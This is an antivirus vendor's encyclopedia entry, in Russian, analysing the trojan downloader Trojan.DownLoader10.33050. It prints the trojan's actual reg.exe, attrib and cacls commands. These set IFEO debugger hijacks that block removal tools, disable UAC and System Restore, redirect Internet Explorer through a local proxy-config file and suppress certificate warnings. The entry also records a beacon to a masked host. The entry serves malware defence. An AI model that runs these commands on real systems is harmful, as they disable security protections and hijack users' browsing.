Trojan.DownLoader10.33050

Добавлен в вирусную базу Dr.Web: 2013-10-27

Описание добавлено: 2013-10-27

Техническая информация

Для обеспечения автозапуска и распространения:

Модифицирует следующие ключи реестра:

[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDFix.exe] 'Debugger' = 'cmd.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmitfraudFix.exe] 'Debugger' = 'cmd.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSIT.exe] 'Debugger' = 'cmd.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe] 'Debugger' = 'cmd.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bankerfix.exe] 'Debugger' = 'cmd.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe] 'Debugger' = 'cmd.exe'

Вредоносные функции:

Для затруднения выявления своего присутствия в системе

блокирует:

Компонент восстановления системы (SR)
Средство контроля пользовательских учетных записей (UAC)

Запускает на исполнение:

'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:/Documents and Settings/%USERNAME%/Application Data//KB000000000001-Microsoft.dat" /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "Autoconfig" /t reg_dword /d 00000001 /f
'<SYSTEM32>\find.exe' "Internet Explorer.lnk"
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main" /v "Extensions Off Page" /t REG_SZ /d ""about:blank""
'<SYSTEM32>\attrib.exe' -r -a -s -h "%APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\prefs.js"
'<SYSTEM32>\rundll32.exe' InetCpl.cpl,ClearMyTracksByProcess 4351
'<SYSTEM32>\attrib.exe' +r "%APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\prefs.js"
'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AdvancedTab" /t reg_dword /d 00000001 /f
'<SYSTEM32>\reg.exe' query "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /V "Start Page"
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main" /v "Extensions Off Page" /t REG_SZ /d ""about:blank""
'<SYSTEM32>\find.exe' "Start"
'<SYSTEM32>\attrib.exe' +h "%APPDATA%\-="
'<SYSTEM32>\find.exe' "olume"
'<SYSTEM32>\cacls.exe' "%APPDATA%\-=" /t /e /p Todos:n
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
'<SYSTEM32>\cscript.exe' %TEMP%\l191.vbs "\Update.lnk" "%APPDATA%\-=\AxInst.exe"
'<SYSTEM32>\reg.exe' query "HKEY_CURRENT_USER\Control Panel\International"
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\_Source.bat" > NUL"
'<SYSTEM32>\find.exe' /i "sLang"
'<SYSTEM32>\find.exe' "Device"
'<SYSTEM32>\getmac.exe'
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmitfraudFix.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDFix.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSIT.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:/Documents and Settings/%USERNAME%/Application Data//KB000000000001-Microsoft.dat" /f
'<SYSTEM32>\attrib.exe' +H "%APPDATA%\KB000000000001-Microsoft.dat"
'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisableSR /t REG_DWORD /d 0x00000001 /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bankerfix.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f

Изменяет следующие настройки браузера Windows Internet Explorer:

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnonBadCertRecving' = '00000000'

Изменения в файловой системе:

Создает следующие файлы:

%APPDATA%\KB000000000001-Microsoft.dat
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\log[1].php
%HOMEPATH%\Desktop\Internet Explorer.lnk
C:\Update.lnk
%TEMP%\pic.gif
%TEMP%\_Source.bat
%TEMP%\l191.vbs

Присваивает атрибут 'скрытый' для следующих файлов:

%APPDATA%\KB000000000001-Microsoft.dat

Удаляет следующие файлы:

%TEMP%\l191.vbs

Сетевая активность:

Подключается к:

'www.va####2014.com.br':80
'localhost':1037

TCP:

Запросы HTTP GET:

www.va####2014.com.br/log.php?a=#############################################

UDP:

DNS ASK www.va####2014.com.br

Другое:

Ищет следующие окна:

ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
ClassName: '' WindowName: '(null)'
ClassName: 'Shell_TrayWnd' WindowName: '(null)'

Изменяет значение AutoConfigURL

Технологии

Термины

Обучение и просвещение

Мифы

Техническая информация

Рекомендации по лечению

Демо бесплатно на 14 дней